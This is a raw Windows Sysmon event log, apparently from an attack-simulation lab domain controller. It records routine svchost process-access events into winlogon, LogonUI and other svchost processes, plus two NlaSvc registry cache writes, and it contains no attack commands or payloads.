09:19:07.462{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052266Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.462{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052265Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.462{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052264Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.462{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052263Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.462{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052262Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.462{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052261Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.462{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052260Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.462{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052259Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.462{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052258Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.462{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052257Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.462{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052256Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.462{5EBD8912-7F2F-614D-0C00-00000000FC01}8284528C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1000-00000000FC01}380C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052255Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.447{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052254Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:07.447{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache\KnownProxylessGatewaysV4Binary Data 13241300x80000000000000001052253Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:07.447{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache\OpportunisticInternetGatewaysV4Binary Data 10341000x80000000000000001052252Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.447{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052251Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.447{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052250Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.447{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052249Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.447{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052248Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.447{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052247Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.447{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052246Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.447{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6C7A-00000000FC01}4396C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052245Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.447{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-79BB-6151-D177-00000000FC01}4028C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2a7a|c:\windows\system32\SYSNTFY.dll+1466|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49e78|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052244Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.431{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052243Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.431{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-79BB-6151-D177-00000000FC01}4028C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052242Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.431{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-79BB-6151-D177-00000000FC01}4028C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052241Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 